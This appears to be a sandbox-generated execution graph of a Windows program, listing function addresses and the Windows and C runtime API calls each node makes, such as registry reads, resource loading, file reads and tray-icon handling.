                          execution_graph 94552 f0df10 94555 f0b710 94552->94555 94556 f0b72b 94555->94556 94557 f50146 94556->94557 94558 f500f8 94556->94558 94578 f0b750 94556->94578 94621 f858a2 256 API calls 2 library calls 94557->94621 94561 f50102 94558->94561 94564 f5010f 94558->94564 94558->94578 94619 f85d33 256 API calls 94561->94619 94577 f0ba20 94564->94577 94620 f861d0 256 API calls 2 library calls 94564->94620 94568 f0bbe0 40 API calls 94568->94578 94569 f503d9 94569->94569 94572 f0ba4e 94573 f50322 94628 f85c0c 82 API calls 94573->94628 94577->94572 94629 f7359c 82 API calls __wsopen_s 94577->94629 94578->94568 94578->94572 94578->94573 94578->94577 94582 f1d336 40 API calls 94578->94582 94586 f0ec40 94578->94586 94610 f0a81b 41 API calls 94578->94610 94611 f1d2f0 40 API calls 94578->94611 94612 f1a01b 256 API calls 94578->94612 94613 f20242 5 API calls __Init_thread_wait 94578->94613 94614 f1edcd 22 API calls 94578->94614 94615 f200a3 29 API calls __onexit 94578->94615 94616 f201f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 94578->94616 94617 f1ee53 82 API calls 94578->94617 94618 f1e5ca 256 API calls 94578->94618 94622 f0aceb 23 API calls ISource 94578->94622 94623 f5f6bf 23 API calls 94578->94623 94624 f0a8c7 94578->94624 94582->94578 94607 f0ec76 ISource 94586->94607 94587 f200a3 29 API calls pre_c_initialization 94587->94607 94588 f1fddb 22 API calls 94588->94607 94589 f0fef7 94597 f0a8c7 22 API calls 94589->94597 94603 f0ed9d ISource 94589->94603 94592 f54600 94598 f0a8c7 22 API calls 94592->94598 94592->94603 94593 f54b0b 94633 f7359c 82 API calls __wsopen_s 94593->94633 94594 f0a8c7 22 API calls 94594->94607 94597->94603 94598->94603 94600 f20242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 94600->94607 94601 f0fbe3 94601->94603 94604 f54bdc 94601->94604 94609 f0f3ae ISource 94601->94609 94602 f0a961 22 API calls 94602->94607 94603->94578 94634 f7359c 82 API calls __wsopen_s 94604->94634 94606 f54beb 94635 f7359c 82 API calls __wsopen_s 94606->94635 94607->94587 94607->94588 94607->94589 94607->94592 94607->94593 94607->94594 94607->94600 94607->94601 94607->94602 94607->94603 94607->94606 94608 f201f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 94607->94608 94607->94609 94630 f101e0 256 API calls 2 library calls 94607->94630 94631 f106a0 41 API calls ISource 94607->94631 94608->94607 94609->94603 94632 f7359c 82 API calls __wsopen_s 94609->94632 94610->94578 94611->94578 94612->94578 94613->94578 94614->94578 94615->94578 94616->94578 94617->94578 94618->94578 94619->94564 94620->94577 94621->94578 94622->94578 94623->94578 94625 f0a8ea __fread_nolock 94624->94625 94626 f0a8db 94624->94626 94625->94578 94626->94625 94636 f1fe0b 94626->94636 94628->94577 94629->94569 94630->94607 94631->94607 94632->94603 94633->94603 94634->94606 94635->94603 94640 f1fddb 94636->94640 94638 f1fdfa 94638->94625 94640->94638 94643 f1fdfc 94640->94643 94646 f2ea0c 94640->94646 94653 f24ead 7 API calls 2 library calls 94640->94653 94641 f2066d 94655 f232a4 RaiseException 94641->94655 94643->94641 94654 f232a4 RaiseException 94643->94654 94644 f2068a 94644->94625 94651 f33820 pair 94646->94651 94647 f3385e 94657 f2f2d9 20 API calls __dosmaperr 94647->94657 94649 f33849 RtlAllocateHeap 94650 f3385c 94649->94650 94649->94651 94650->94640 94651->94647 94651->94649 94656 f24ead 7 API calls 2 library calls 94651->94656 94653->94640 94654->94641 94655->94644 94656->94651 94657->94650 94658 f0fe73 94665 f1ceb1 94658->94665 94660 f0fe89 94674 f1cf92 94660->94674 94662 f0feb3 94686 f7359c 82 API calls __wsopen_s 94662->94686 94664 f54ab8 94666 f1ced2 94665->94666 94667 f1cebf 94665->94667 94668 f1cf05 94666->94668 94669 f1ced7 94666->94669 94687 f0aceb 23 API calls ISource 94667->94687 94698 f0aceb 23 API calls ISource 94668->94698 94688 f1fddb 94669->94688 94673 f1cec9 94673->94660 94702 f06270 94674->94702 94676 f1cfc9 94679 f1cffa 94676->94679 94707 f09cb3 94676->94707 94679->94662 94683 f5d184 94685 f5d188 94683->94685 94723 f0aceb 23 API calls ISource 94683->94723 94685->94685 94686->94664 94687->94673 94690 f1fde0 94688->94690 94689 f2ea0c ___std_exception_copy 21 API calls 94689->94690 94690->94689 94691 f1fdfa 94690->94691 94693 f1fdfc 94690->94693 94699 f24ead 7 API calls 2 library calls 94690->94699 94691->94673 94694 f2066d 94693->94694 94700 f232a4 RaiseException 94693->94700 94701 f232a4 RaiseException 94694->94701 94697 f2068a 94697->94673 94698->94673 94699->94690 94700->94694 94701->94697 94703 f1fe0b 22 API calls 94702->94703 94704 f06295 94703->94704 94705 f1fddb 22 API calls 94704->94705 94706 f062a3 94705->94706 94706->94676 94708 f09cc2 _wcslen 94707->94708 94709 f1fe0b 22 API calls 94708->94709 94710 f09cea __fread_nolock 94709->94710 94711 f1fddb 22 API calls 94710->94711 94712 f09d00 94711->94712 94713 f06350 94712->94713 94714 f06362 94713->94714 94715 f44a51 94713->94715 94724 f06373 94714->94724 94734 f04a88 22 API calls __fread_nolock 94715->94734 94718 f0636e 94722 f1d2f0 40 API calls 94718->94722 94719 f44a5b 94720 f44a67 94719->94720 94721 f0a8c7 22 API calls 94719->94721 94721->94720 94722->94683 94723->94685 94726 f06382 94724->94726 94731 f063b6 __fread_nolock 94724->94731 94725 f44a82 94728 f1fddb 22 API calls 94725->94728 94726->94725 94727 f063a9 94726->94727 94726->94731 94735 f0a587 94727->94735 94730 f44a91 94728->94730 94732 f1fe0b 22 API calls 94730->94732 94731->94718 94733 f44ac5 __fread_nolock 94732->94733 94734->94719 94737 f0a59d 94735->94737 94739 f0a598 __fread_nolock 94735->94739 94736 f4f80f 94737->94736 94738 f1fe0b 22 API calls 94737->94738 94738->94739 94739->94731 94740 f01033 94745 f04c91 94740->94745 94744 f01042 94753 f0a961 94745->94753 94749 f04d9c 94750 f01038 94749->94750 94761 f051f7 22 API calls __fread_nolock 94749->94761 94752 f200a3 29 API calls __onexit 94750->94752 94752->94744 94754 f1fe0b 22 API calls 94753->94754 94755 f0a976 94754->94755 94756 f1fddb 22 API calls 94755->94756 94757 f04cff 94756->94757 94758 f03af0 94757->94758 94762 f03b1c 94758->94762 94761->94749 94763 f03b29 94762->94763 94765 f03b0f 94762->94765 94764 f03b30 RegOpenKeyExW 94763->94764 94763->94765 94764->94765 94766 f03b4a RegQueryValueExW 94764->94766 94765->94749 94767 f03b80 RegCloseKey 94766->94767 94768 f03b6b 94766->94768 94767->94765 94768->94767 94769 f03156 94772 f03170 94769->94772 94773 f03187 94772->94773 94774 f031eb 94773->94774 94775 f0318c 94773->94775 94812 f031e9 94773->94812 94777 f031f1 94774->94777 94778 f42dfb 94774->94778 94779 f03265 PostQuitMessage 94775->94779 94780 f03199 94775->94780 94776 f031d0 DefWindowProcW 94814 f0316a 94776->94814 94781 f031f8 94777->94781 94782 f0321d SetTimer RegisterWindowMessageW 94777->94782 94821 f018e2 10 API calls 94778->94821 94779->94814 94784 f031a4 94780->94784 94785 f42e7c 94780->94785 94790 f03201 KillTimer 94781->94790 94791 f42d9c 94781->94791 94786 f03246 CreatePopupMenu 94782->94786 94782->94814 94787 f42e68 94784->94787 94788 f031ae 94784->94788 94836 f6bf30 34 API calls ___scrt_fastfail 94785->94836 94786->94814 94835 f6c161 27 API calls ___scrt_fastfail 94787->94835 94794 f42e4d 94788->94794 94795 f031b9 94788->94795 94817 f030f2 Shell_NotifyIconW ___scrt_fastfail 94790->94817 94797 f42dd7 MoveWindow 94791->94797 94798 f42da1 94791->94798 94792 f42e1c 94822 f1e499 42 API calls 94792->94822 94794->94776 94834 f60ad7 22 API calls 94794->94834 94801 f031c4 94795->94801 94802 f03253 94795->94802 94796 f42e8e 94796->94776 94796->94814 94797->94814 94803 f42dc6 SetFocus 94798->94803 94804 f42da7 94798->94804 94801->94776 94823 f030f2 Shell_NotifyIconW ___scrt_fastfail 94801->94823 94819 f0326f 44 API calls ___scrt_fastfail 94802->94819 94803->94814 94804->94801 94808 f42db0 94804->94808 94805 f03214 94818 f03c50 DeleteObject DestroyWindow 94805->94818 94806 f03263 94806->94814 94820 f018e2 10 API calls 94808->94820 94812->94776 94815 f42e41 94824 f03837 94815->94824 94817->94805 94818->94814 94819->94806 94820->94814 94821->94792 94822->94801 94823->94815 94825 f03862 ___scrt_fastfail 94824->94825 94837 f04212 94825->94837 94829 f43386 Shell_NotifyIconW 94830 f03906 Shell_NotifyIconW 94841 f03923 94830->94841 94831 f038e8 94831->94829 94831->94830 94833 f0391c 94833->94812 94834->94812 94835->94806 94836->94796 94838 f435a4 94837->94838 94839 f038b7 94837->94839 94838->94839 94840 f435ad DestroyIcon 94838->94840 94839->94831 94863 f6c874 42 API calls _strftime 94839->94863 94840->94839 94842 f03a13 94841->94842 94843 f0393f 94841->94843 94842->94833 94844 f06270 22 API calls 94843->94844 94845 f0394d 94844->94845 94846 f43393 LoadStringW 94845->94846 94847 f0395a 94845->94847 94849 f433ad 94846->94849 94864 f06b57 94847->94864 94853 f0a8c7 22 API calls 94849->94853 94857 f03994 ___scrt_fastfail 94849->94857 94850 f0396f 94851 f0397c 94850->94851 94852 f433c9 94850->94852 94851->94849 94854 f03986 94851->94854 94855 f06350 22 API calls 94852->94855 94853->94857 94856 f06350 22 API calls 94854->94856 94858 f433d7 94855->94858 94856->94857 94860 f039f9 Shell_NotifyIconW 94857->94860 94858->94857 94876 f033c6 94858->94876 94860->94842 94861 f433f9 94862 f033c6 22 API calls 94861->94862 94862->94857 94863->94831 94865 f44ba1 94864->94865 94866 f06b67 _wcslen 94864->94866 94886 f093b2 94865->94886 94869 f06ba2 94866->94869 94870 f06b7d 94866->94870 94868 f44baa 94868->94868 94872 f1fddb 22 API calls 94869->94872 94885 f06f34 22 API calls 94870->94885 94874 f06bae 94872->94874 94873 f06b85 __fread_nolock 94873->94850 94875 f1fe0b 22 API calls 94874->94875 94875->94873 94877 f033dd 94876->94877 94878 f430bb 94876->94878 94896 f033ee 94877->94896 94880 f1fddb 22 API calls 94878->94880 94882 f430c5 _wcslen 94880->94882 94881 f033e8 94881->94861 94883 f1fe0b 22 API calls 94882->94883 94884 f430fe __fread_nolock 94883->94884 94885->94873 94887 f093c9 __fread_nolock 94886->94887 94888 f093c0 94886->94888 94887->94868 94888->94887 94890 f0aec9 94888->94890 94891 f0aed9 __fread_nolock 94890->94891 94892 f0aedc 94890->94892 94891->94887 94893 f1fddb 22 API calls 94892->94893 94894 f0aee7 94893->94894 94895 f1fe0b 22 API calls 94894->94895 94895->94891 94897 f033fe _wcslen 94896->94897 94898 f03411 94897->94898 94899 f4311d 94897->94899 94901 f0a587 22 API calls 94898->94901 94900 f1fddb 22 API calls 94899->94900 94902 f43127 94900->94902 94903 f0341e __fread_nolock 94901->94903 94904 f1fe0b 22 API calls 94902->94904 94903->94881 94905 f43157 __fread_nolock 94904->94905 94906 f02e37 94907 f0a961 22 API calls 94906->94907 94908 f02e4d 94907->94908 94985 f04ae3 94908->94985 94910 f02e6b 94999 f03a5a 94910->94999 94912 f02e7f 94913 f09cb3 22 API calls 94912->94913 94914 f02e8c 94913->94914 95006 f04ecb 94914->95006 94917 f42cb0 95044 f72cf9 94917->95044 94918 f02ead 94921 f0a8c7 22 API calls 94918->94921 94920 f42cc3 94922 f42ccf 94920->94922 95070 f04f39 94920->95070 94923 f02ec3 94921->94923 94926 f04f39 68 API calls 94922->94926 95028 f06f88 22 API calls 94923->95028 94928 f42ce5 94926->94928 94927 f02ecf 94929 f09cb3 22 API calls 94927->94929 95076 f03084 22 API calls 94928->95076 94930 f02edc 94929->94930 95029 f0a81b 41 API calls 94930->95029 94933 f02eec 94935 f09cb3 22 API calls 94933->94935 94934 f42d02 95077 f03084 22 API calls 94934->95077 94936 f02f12 94935->94936 95030 f0a81b 41 API calls 94936->95030 94939 f42d1e 94940 f03a5a 24 API calls 94939->94940 94941 f42d44 94940->94941 95078 f03084 22 API calls 94941->95078 94942 f02f21 94945 f0a961 22 API calls 94942->94945 94944 f42d50 94946 f0a8c7 22 API calls 94944->94946 94947 f02f3f 94945->94947 94948 f42d5e 94946->94948 95031 f03084 22 API calls 94947->95031 95079 f03084 22 API calls 94948->95079 94951 f02f4b 95032 f24a28 40 API calls 3 library calls 94951->95032 94952 f42d6d 94956 f0a8c7 22 API calls 94952->94956 94954 f02f59 94954->94928 94955 f02f63 94954->94955 95033 f24a28 40 API calls 3 library calls 94955->95033 94959 f42d83 94956->94959 94958 f02f6e 94958->94934 94960 f02f78 94958->94960 95080 f03084 22 API calls 94959->95080 95034 f24a28 40 API calls 3 library calls 94960->95034 94963 f42d90 94964 f02f83 94964->94939 94965 f02f8d 94964->94965 95035 f24a28 40 API calls 3 library calls 94965->95035 94967 f02f98 94968 f02fdc 94967->94968 95036 f03084 22 API calls 94967->95036 94968->94952 94969 f02fe8 94968->94969 94969->94963 95038 f063eb 22 API calls 94969->95038 94972 f02fbf 94974 f0a8c7 22 API calls 94972->94974 94973 f02ff8 95039 f06a50 22 API calls 94973->95039 94976 f02fcd 94974->94976 95037 f03084 22 API calls 94976->95037 94977 f03006 95040 f070b0 23 API calls 94977->95040 94982 f03021 94983 f03065 94982->94983 95041 f06f88 22 API calls 94982->95041 95042 f070b0 23 API calls 94982->95042 95043 f03084 22 API calls 94982->95043 94986 f04af0 __wsopen_s 94985->94986 94987 f06b57 22 API calls 94986->94987 94988 f04b22 94986->94988 94987->94988 94991 f04b58 94988->94991 95081 f04c6d 94988->95081 94990 f04c29 94992 f04c5e 94990->94992 94993 f09cb3 22 API calls 94990->94993 94991->94990 94995 f09cb3 22 API calls 94991->94995 94998 f04c6d 22 API calls 94991->94998 95084 f0515f 94991->95084 94992->94910 94994 f04c52 94993->94994 94996 f0515f 22 API calls 94994->94996 94995->94991 94996->94992 94998->94991 95090 f41f50 94999->95090 95002 f09cb3 22 API calls 95003 f03a8d 95002->95003 95092 f03aa2 95003->95092 95005 f03a97 95005->94912 95112 f04e90 LoadLibraryA 95006->95112 95011 f04ef6 LoadLibraryExW 95120 f04e59 LoadLibraryA 95011->95120 95012 f43ccf 95014 f04f39 68 API calls 95012->95014 95016 f43cd6 95014->95016 95018 f04e59 3 API calls 95016->95018 95019 f43cde 95018->95019 95142 f050f5 95019->95142 95020 f04f20 95020->95019 95021 f04f2c 95020->95021 95023 f04f39 68 API calls 95021->95023 95025 f02ea5 95023->95025 95025->94917 95025->94918 95027 f43d05 95028->94927 95029->94933 95030->94942 95031->94951 95032->94954 95033->94958 95034->94964 95035->94967 95036->94972 95037->94968 95038->94973 95039->94977 95040->94982 95041->94982 95042->94982 95043->94982 95045 f72d15 95044->95045 95046 f0511f 64 API calls 95045->95046 95047 f72d29 95046->95047 95413 f72e66 95047->95413 95050 f050f5 40 API calls 95051 f72d56 95050->95051 95052 f050f5 40 API calls 95051->95052 95053 f72d66 95052->95053 95054 f050f5 40 API calls 95053->95054 95055 f72d81 95054->95055 95056 f050f5 40 API calls 95055->95056 95057 f72d9c 95056->95057 95058 f0511f 64 API calls 95057->95058 95059 f72db3 95058->95059 95060 f2ea0c ___std_exception_copy 21 API calls 95059->95060 95061 f72dba 95060->95061 95062 f2ea0c ___std_exception_copy 21 API calls 95061->95062 95063 f72dc4 95062->95063 95064 f050f5 40 API calls 95063->95064 95065 f72dd8 95064->95065 95066 f728fe 27 API calls 95065->95066 95068 f72dee 95066->95068 95067 f72d3f 95067->94920 95068->95067 95419 f722ce 95068->95419 95071 f04f43 95070->95071 95075 f04f4a 95070->95075 95072 f2e678 67 API calls 95071->95072 95072->95075 95073 f04f59 95073->94922 95074 f04f6a FreeLibrary 95074->95073 95075->95073 95075->95074 95076->94934 95077->94939 95078->94944 95079->94952 95080->94963 95082 f0aec9 22 API calls 95081->95082 95083 f04c78 95082->95083 95083->94988 95085 f0516e 95084->95085 95089 f0518f __fread_nolock 95084->95089 95088 f1fe0b 22 API calls 95085->95088 95086 f1fddb 22 API calls 95087 f051a2 95086->95087 95087->94991 95088->95089 95089->95086 95091 f03a67 GetModuleFileNameW 95090->95091 95091->95002 95093 f41f50 __wsopen_s 95092->95093 95094 f03aaf GetFullPathNameW 95093->95094 95095 f03ae9 95094->95095 95096 f03ace 95094->95096 95106 f0a6c3 95095->95106 95097 f06b57 22 API calls 95096->95097 95099 f03ada 95097->95099 95102 f037a0 95099->95102 95103 f037ae 95102->95103 95104 f093b2 22 API calls 95103->95104 95105 f037c2 95104->95105 95105->95005 95107 f0a6d0 95106->95107 95108 f0a6dd 95106->95108 95107->95099 95109 f1fddb 22 API calls 95108->95109 95110 f0a6e7 95109->95110 95111 f1fe0b 22 API calls 95110->95111 95111->95107 95113 f04ec6 95112->95113 95114 f04ea8 GetProcAddress 95112->95114 95117 f2e5eb 95113->95117 95115 f04eb8 95114->95115 95115->95113 95116 f04ebf FreeLibrary 95115->95116 95116->95113 95150 f2e52a 95117->95150 95119 f04eea 95119->95011 95119->95012 95121 f04e8d 95120->95121 95122 f04e6e GetProcAddress 95120->95122 95125 f04f80 95121->95125 95123 f04e7e 95122->95123 95123->95121 95124 f04e86 FreeLibrary 95123->95124 95124->95121 95126 f1fe0b 22 API calls 95125->95126 95127 f04f95 95126->95127 95218 f05722 95127->95218 95129 f04fa1 __fread_nolock 95130 f050a5 95129->95130 95131 f43d1d 95129->95131 95141 f04fdc 95129->95141 95221 f042a2 CreateStreamOnHGlobal 95130->95221 95232 f7304d 74 API calls 95131->95232 95134 f43d22 95136 f0511f 64 API calls 95134->95136 95135 f050f5 40 API calls 95135->95141 95137 f43d45 95136->95137 95138 f050f5 40 API calls 95137->95138 95140 f0506e ISource 95138->95140 95140->95020 95141->95134 95141->95135 95141->95140 95227 f0511f 95141->95227 95143 f43d70 95142->95143 95144 f05107 95142->95144 95254 f2e8c4 95144->95254 95147 f728fe 95396 f7274e 95147->95396 95149 f72919 95149->95027 95153 f2e536 CallCatchBlock 95150->95153 95151 f2e544 95175 f2f2d9 20 API calls __dosmaperr 95151->95175 95153->95151 95154 f2e574 95153->95154 95156 f2e586 95154->95156 95157 f2e579 95154->95157 95155 f2e549 95176 f327ec 26 API calls __cftof 95155->95176 95167 f38061 95156->95167 95177 f2f2d9 20 API calls __dosmaperr 95157->95177 95161 f2e58f 95162 f2e5a2 95161->95162 95163 f2e595 95161->95163 95179 f2e5d4 LeaveCriticalSection __fread_nolock 95162->95179 95178 f2f2d9 20 API calls __dosmaperr 95163->95178 95164 f2e554 __fread_nolock 95164->95119 95168 f3806d CallCatchBlock 95167->95168 95180 f32f5e EnterCriticalSection 95168->95180 95170 f3807b 95181 f380fb 95170->95181 95174 f380ac __fread_nolock 95174->95161 95175->95155 95176->95164 95177->95164 95178->95164 95179->95164 95180->95170 95190 f3811e 95181->95190 95182 f38177 95199 f34c7d 95182->95199 95187 f38189 95189 f38088 95187->95189 95212 f33405 11 API calls 2 library calls 95187->95212 95194 f380b7 95189->95194 95190->95182 95190->95189 95197 f2918d EnterCriticalSection 95190->95197 95198 f291a1 LeaveCriticalSection 95190->95198 95191 f381a8 95213 f2918d EnterCriticalSection 95191->95213 95217 f32fa6 LeaveCriticalSection 95194->95217 95196 f380be 95196->95174 95197->95190 95198->95190 95204 f34c8a pair 95199->95204 95200 f34cca 95215 f2f2d9 20 API calls __dosmaperr 95200->95215 95201 f34cb5 RtlAllocateHeap 95202 f34cc8 95201->95202 95201->95204 95206 f329c8 95202->95206 95204->95200 95204->95201 95214 f24ead 7 API calls 2 library calls 95204->95214 95207 f329d3 RtlFreeHeap 95206->95207 95208 f329fc __dosmaperr 95206->95208 95207->95208 95209 f329e8 95207->95209 95208->95187 95216 f2f2d9 20 API calls __dosmaperr 95209->95216 95211 f329ee GetLastError 95211->95208 95212->95191 95213->95189 95214->95204 95215->95202 95216->95211 95217->95196 95219 f1fddb 22 API calls 95218->95219 95220 f05734 95219->95220 95220->95129 95222 f042bc FindResourceExW 95221->95222 95226 f042d9 95221->95226 95223 f435ba LoadResource 95222->95223 95222->95226 95224 f435cf SizeofResource 95223->95224 95223->95226 95225 f435e3 LockResource 95224->95225 95224->95226 95225->95226 95226->95141 95228 f43d90 95227->95228 95229 f0512e 95227->95229 95233 f2ece3 95229->95233 95232->95134 95236 f2eaaa 95233->95236 95235 f0513c 95235->95141 95240 f2eab6 CallCatchBlock 95236->95240 95237 f2eac2 95249 f2f2d9 20 API calls __dosmaperr 95237->95249 95239 f2eae8 95251 f2918d EnterCriticalSection 95239->95251 95240->95237 95240->95239 95241 f2eac7 95250 f327ec 26 API calls __cftof 95241->95250 95243 f2eaf4 95252 f2ec0a 62 API calls 2 library calls 95243->95252 95246 f2eb08 95253 f2eb27 LeaveCriticalSection __fread_nolock 95246->95253 95248 f2ead2 __fread_nolock 95248->95235 95249->95241 95250->95248 95251->95243 95252->95246 95253->95248 95257 f2e8e1 95254->95257 95256 f05118 95256->95147 95258 f2e8ed CallCatchBlock 95257->95258 95259 f2e92d 95258->95259 95260 f2e925 __fread_nolock 95258->95260 95262 f2e900 ___scrt_fastfail 95258->95262 95270 f2918d EnterCriticalSection 95259->95270 95260->95256 95284 f2f2d9 20 API calls __dosmaperr 95262->95284 95263 f2e937 95271 f2e6f8 95263->95271 95265 f2e91a 95285 f327ec 26 API calls __cftof 95265->95285 95270->95263 95273 f2e70a ___scrt_fastfail 95271->95273 95277 f2e727 95271->95277 95272 f2e717 95359 f2f2d9 20 API calls __dosmaperr 95272->95359 95273->95272 95273->95277 95280 f2e76a __fread_nolock 95273->95280 95275 f2e71c 95360 f327ec 26 API calls __cftof 95275->95360 95286 f2e96c LeaveCriticalSection __fread_nolock 95277->95286 95278 f2e886 ___scrt_fastfail 95362 f2f2d9 20 API calls __dosmaperr 95278->95362 95280->95277 95280->95278 95287 f2d955 95280->95287 95294 f38d45 95280->95294 95361 f2cf78 26 API calls 4 library calls 95280->95361 95284->95265 95285->95260 95286->95260 95288 f2d961 95287->95288 95289 f2d976 95287->95289 95363 f2f2d9 20 API calls __dosmaperr 95288->95363 95289->95280 95291 f2d966 95364 f327ec 26 API calls __cftof 95291->95364 95293 f2d971 95293->95280 95295 f38d57 95294->95295 95296 f38d6f 95294->95296 95374 f2f2c6 20 API calls __dosmaperr 95295->95374 95298 f390d9 95296->95298 95301 f38db4 95296->95301 95390 f2f2c6 20 API calls __dosmaperr 95298->95390 95299 f38d5c 95375 f2f2d9 20 API calls __dosmaperr 95299->95375 95304 f38dbf 95301->95304 95307 f38d64 95301->95307 95312 f38def 95301->95312 95303 f390de 95391 f2f2d9 20 API calls __dosmaperr 95303->95391 95376 f2f2c6 20 API calls __dosmaperr 95304->95376 95307->95280 95308 f38dcc 95392 f327ec 26 API calls __cftof 95308->95392 95309 f38dc4 95377 f2f2d9 20 API calls __dosmaperr 95309->95377 95313 f38e08 95312->95313 95314 f38e4a 95312->95314 95315 f38e2e 95312->95315 95313->95315 95321 f38e15 95313->95321 95381 f33820 21 API calls 2 library calls 95314->95381 95378 f2f2c6 20 API calls __dosmaperr 95315->95378 95317 f38e33 95379 f2f2d9 20 API calls __dosmaperr 95317->95379 95365 f3f89b 95321->95365 95322 f38e61 95325 f329c8 _free 20 API calls 95322->95325 95323 f38e3a 95380 f327ec 26 API calls __cftof 95323->95380 95324 f38fb3 95327 f39029 95324->95327 95330 f38fcc GetConsoleMode 95324->95330 95328 f38e6a 95325->95328 95329 f3902d ReadFile 95327->95329 95331 f329c8 _free 20 API calls 95328->95331 95332 f390a1 GetLastError 95329->95332 95333 f39047 95329->95333 95330->95327 95334 f38fdd 95330->95334 95335 f38e71 95331->95335 95336 f39005 95332->95336 95337 f390ae 95332->95337 95333->95332 95338 f3901e 95333->95338 95334->95329 95339 f38fe3 ReadConsoleW 95334->95339 95340 f38e96 95335->95340 95341 f38e7b 95335->95341 95356 f38e45 __fread_nolock 95336->95356 95385 f2f2a3 20 API calls __dosmaperr 95336->95385 95388 f2f2d9 20 API calls __dosmaperr 95337->95388 95352 f39083 95338->95352 95353 f3906c 95338->95353 95338->95356 95339->95338 95344 f38fff GetLastError 95339->95344 95384 f39424 28 API calls __wsopen_s 95340->95384 95382 f2f2d9 20 API calls __dosmaperr 95341->95382 95344->95336 95345 f329c8 _free 20 API calls 95345->95307 95347 f38e80 95383 f2f2c6 20 API calls __dosmaperr 95347->95383 95348 f390b3 95389 f2f2c6 20 API calls __dosmaperr 95348->95389 95355 f3909a 95352->95355 95352->95356 95386 f38a61 31 API calls 3 library calls 95353->95386 95387 f388a1 29 API calls __wsopen_s 95355->95387 95356->95345 95358 f3909f 95358->95356 95359->95275 95360->95277 95361->95280 95362->95275 95363->95291 95364->95293 95366 f3f8b5 95365->95366 95367 f3f8a8 95365->95367 95369 f3f8c1 95366->95369 95394 f2f2d9 20 API calls __dosmaperr 95366->95394 95393 f2f2d9 20 API calls __dosmaperr 95367->95393 95369->95324 95371 f3f8ad 95371->95324 95372 f3f8e2 95395 f327ec 26 API calls __cftof 95372->95395 95374->95299 95375->95307 95376->95309 95377->95308 95378->95317 95379->95323 95380->95356 95381->95322 95382->95347 95383->95356 95384->95321 95385->95356 95386->95356 95387->95358 95388->95348 95389->95356 95390->95303 95391->95308 95392->95307 95393->95371 95394->95372 95395->95371 95399 f2e4e8 95396->95399 95398 f7275d 95398->95149 95402 f2e469 95399->95402 95401 f2e505 95401->95398 95403 f2e478 95402->95403 95404 f2e48c 95402->95404 95410 f2f2d9 20 API calls __dosmaperr 95403->95410 95409 f2e488 __alldvrm 95404->95409 95412 f3333f 11 API calls 2 library calls 95404->95412 95406 f2e47d 95411 f327ec 26 API calls __cftof 95406->95411 95409->95401 95410->95406 95411->95409 95412->95409 95417 f72e7a 95413->95417 95414 f728fe 27 API calls 95414->95417 95415 f72d3b 95415->95050 95415->95067 95416 f050f5 40 API calls 95416->95417 95417->95414 95417->95415 95417->95416 95418 f0511f 64 API calls 95417->95418 95418->95417 95420 f722d9 95419->95420 95421 f722e7 95419->95421 95422 f2e5eb 29 API calls 95420->95422 95423 f7232c 95421->95423 95424 f2e5eb 29 API calls 95421->95424 95435 f722f0 95421->95435 95422->95421 95448 f72557 95423->95448 95426 f72311 95424->95426 95426->95423 95428 f7231a 95426->95428 95427 f72370 95429 f72395 95427->95429 95430 f72374 95427->95430 95432 f2e678 67 API calls 95428->95432 95428->95435 95452 f72171 95429->95452 95431 f72381 95430->95431 95434 f2e678 67 API calls 95430->95434 95431->95435 95437 f2e678 67 API calls 95431->95437 95432->95435 95434->95431 95435->95067 95436 f7239d 95438 f723c3 95436->95438 95439 f723a3 95436->95439 95437->95435 95459 f723f3 95438->95459 95440 f723b0 95439->95440 95442 f2e678 67 API calls 95439->95442 95440->95435 95443 f2e678 67 API calls 95440->95443 95442->95440 95443->95435 95444 f723ca 95445 f723de 95444->95445 95467 f2e678 95444->95467 95445->95435 95447 f2e678 67 API calls 95445->95447 95447->95435 95449 f7257c 95448->95449 95451 f72565 __fread_nolock 95448->95451 95450 f2e8c4 __fread_nolock 40 API calls 95449->95450 95450->95451 95451->95427 95453 f2ea0c ___std_exception_copy 21 API calls 95452->95453 95454 f7217f 95453->95454 95455 f2ea0c ___std_exception_copy 21 API calls 95454->95455 95456 f72190 95455->95456 95457 f2ea0c ___std_exception_copy 21 API calls 95456->95457 95458 f7219c 95457->95458 95458->95436 95466 f72408 95459->95466 95460 f724c0 95484 f72724 95460->95484 95462 f721cc 40 API calls 95462->95466 95463 f724c7 95463->95444 95466->95460 95466->95462 95466->95463 95480 f72606 95466->95480 95488 f72269 40 API calls 95466->95488 95468 f2e684 CallCatchBlock 95467->95468 95469 f2e695 95468->95469 95470 f2e6aa 95468->95470 95562 f2f2d9 20 API calls __dosmaperr 95469->95562 95477 f2e6a5 __fread_nolock 95470->95477 95545 f2918d EnterCriticalSection 95470->95545 95473 f2e69a 95563 f327ec 26 API calls __cftof 95473->95563 95474 f2e6c6 95546 f2e602 95474->95546 95477->95445 95478 f2e6d1 95564 f2e6ee LeaveCriticalSection __fread_nolock 95478->95564 95481 f72617 95480->95481 95482 f7261d 95480->95482 95481->95482 95489 f726d7 95481->95489 95482->95466 95485 f72731 95484->95485 95486 f72742 95484->95486 95487 f2dbb3 65 API calls 95485->95487 95486->95463 95487->95486 95488->95466 95490 f72703 95489->95490 95491 f72714 95489->95491 95493 f2dbb3 95490->95493 95491->95481 95494 f2dbc1 95493->95494 95495 f2dbdd 95493->95495 95494->95495 95496 f2dbe3 95494->95496 95497 f2dbcd 95494->95497 95495->95491 95502 f2d9cc 95496->95502 95505 f2f2d9 20 API calls __dosmaperr 95497->95505 95500 f2dbd2 95506 f327ec 26 API calls __cftof 95500->95506 95507 f2d97b 95502->95507 95505->95500 95506->95495 95508 f2d987 CallCatchBlock 95507->95508 95515 f2918d EnterCriticalSection 95508->95515 95510 f2d995 95516 f2d9f4 95510->95516 95515->95510 95524 f349a1 95516->95524 95525 f2d955 __fread_nolock 26 API calls 95524->95525 95526 f349b0 95525->95526 95527 f3f89b __fread_nolock 26 API calls 95526->95527 95528 f349b6 95527->95528 95529 f33820 __fread_nolock 21 API calls 95528->95529 95532 f2da09 95528->95532 95530 f34a15 95529->95530 95531 f329c8 _free 20 API calls 95530->95531 95531->95532 95533 f2da3a 95532->95533 95534 f2da4c 95533->95534 95541 f2da24 95533->95541 95535 f2da5a 95534->95535 95537 f2da85 __fread_nolock 95534->95537 95534->95541 95540 f2dc0b 62 API calls 95537->95540 95537->95541 95542 f2d955 __fread_nolock 26 API calls 95537->95542 95543 f359be __wsopen_s 62 API calls 95537->95543 